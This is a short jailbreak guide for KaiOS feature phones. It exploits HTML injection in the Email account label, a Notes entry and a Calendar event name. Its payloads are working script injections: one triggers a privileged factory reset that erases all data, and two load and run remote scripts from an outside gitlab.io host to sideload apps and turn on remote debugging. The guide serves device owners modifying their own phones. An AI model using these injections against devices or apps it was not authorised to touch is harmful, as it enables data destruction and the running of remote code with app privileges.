# Script for jailbreaking KaiOS devices using HTML injection

## Prerequisites

* An Email account synced with the KaiOS 'Email' app

## Instructions

### Privileged Factory Reset

1. Open the Email app
2. Go to Options -> Settings -> [your account] -> Account Label
3. Enter the following HTML code:

        <iframe srcdoc='<script src="data:text/html,navigator.mozPower.factoryReset(&apos;root&apos;)"></script>'>

4. Save
5. ALL YOUR DATA WILL BE ERASED, but the developer menu should appear in the
   Settings -> Device menu.

### Installing apps

1. Download an [OmniSD](https://sites.google.com/view/bananahackers/install-omnisd)-formatted package
2. Open the Notes app
3. Create a new note
4. Enter the following HTML code:

        <iframe srcdoc='<script src="https://affenull2345.gitlab.io/kaios-inject-scripts/i.js"></script>'>

5. Save
6. Select the package from 'Downloads'
7. The app will be installed!

# Alternative method

1. Open the Calendar app
2. Create a new event in the future
3. Enter the following HTML code as the name:

        <iframe srcdoc='<script src="https://affenull2345.gitlab.io/kaios-inject-scripts/s.js"></script>'>
        
4. Save
5. Select 'Search' from the Options menu
6. You will be prompted for a setting name, to enable debugging use 'debugger.remote-mode' as the name and 'adb-devtools' as the value
